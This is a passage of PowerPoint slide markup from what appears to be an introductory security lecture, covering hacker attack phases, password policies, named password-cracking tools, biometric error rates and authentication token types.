          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Delete accounts that are no longer used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Properly train users about the necessity of maintaining security and the use of strong passwords. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1227619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What Does a Malicious Hacker Do?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990720" y="1752480"/>
            <a:ext cx="7695720" cy="4647960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276720" y="1983600"/>
            <a:ext cx="2361960" cy="8668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11240" tIns="111240" rIns="68760" bIns="110880" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543760" y="2666520"/>
            <a:ext cx="3465000" cy="3465000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2609259" h="1732768">
                <a:moveTo>
                  <a:pt x="2609259" y="238027"/>
                </a:moveTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5438520" y="3180960"/>
            <a:ext cx="1333800" cy="8668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11240" tIns="111240" rIns="68760" bIns="110880" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724840" y="2417040"/>
            <a:ext cx="3465000" cy="3465000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3461387" h="1852624">
                <a:moveTo>
                  <a:pt x="3461387" y="1852625"/>
                </a:moveTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809240" y="5118120"/>
            <a:ext cx="1333800" cy="8668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11240" tIns="111240" rIns="68760" bIns="110880" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Gaining access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724840" y="2417040"/>
            <a:ext cx="3465000" cy="3465000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1962343" h="3450261">
                <a:moveTo>
                  <a:pt x="1962343" y="3450262"/>
                </a:moveTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687400" y="5118120"/>
            <a:ext cx="1579800" cy="8668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11240" tIns="111240" rIns="68760" bIns="110880" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Maintaining access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724840" y="2417040"/>
            <a:ext cx="3465000" cy="3465000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1732769" h="2509593">
                <a:moveTo>
                  <a:pt x="183888" y="2509594"/>
                </a:moveTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2142720" y="3180960"/>
            <a:ext cx="1333800" cy="86688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11240" tIns="111240" rIns="68760" bIns="110880" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Covering tracks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905920" y="2666520"/>
            <a:ext cx="3465000" cy="3465000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1732769" h="1732768">
                <a:moveTo>
                  <a:pt x="582035" y="437276"/>
                </a:moveTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">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on creating passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Require that users change passwords consistently. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Never display passwords in clear form on any screen or within any form. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Longer passwords, such as those with 16 characters or more, are harder for a brute-force password-cracking tool to discover. However, it’s harder for people to remember longer passwords, which often leads users to write them down. Your organization should have a standard security awareness rule that no passwords should ever be written down. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Create lists of passwords users should avoid. Easy-to-memorize passwords are often easily discovered by password-cracking tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>If the root or administrator password is ever compromised, every password on every account should be changed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Passwords should be handed out in person after the user has proved their identity. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Never transmit passwords via email.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="701328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 Cracking Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cain and Able</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John the Ripper </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35809791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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“something you are,” authentication category</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Biometric factor is a behavioral or physiological characteristic that is unique to a subject.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples: fingerprints, face scans, iris scans, retina scans, hand geometry, heart/pulse patterns, voice patterns, signature dynamics, and keystroke patterns (keystroke dynamics).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20715133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 Factor Ratings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Biometric devices are rated for performance in producing false negative and false positive authentications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most biometric devices have a sensitivity adjustment so they can be tuned to be more or less sensitive. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33120136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 Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type 1 Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A valid subject is not authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Occurs when a biometric device is too sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> False Rejection Rate (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FRR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type 2 Error </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An invalid subject is authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Occurs when a biometric device is less sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False Acceptance Rate (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1314571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 Device Sensitivity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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2667000" y="2438400"/>
            <a:ext cx="3543300" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12307026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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password-generating devices that subjects must carry with them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“something you have.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Four types of token devices:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Synchronous dynamic password tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Challenge-response tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="http://www.pcbanker.com/CustServ/securIDinfo.asp">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3200400"/>
            <a:ext cx="2257778" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9851849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Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static Token </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Swipe card, a smart card, a floppy disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Offer a physical means to provide identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Still require an additional factor to provide authentication (a password or biometric factor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
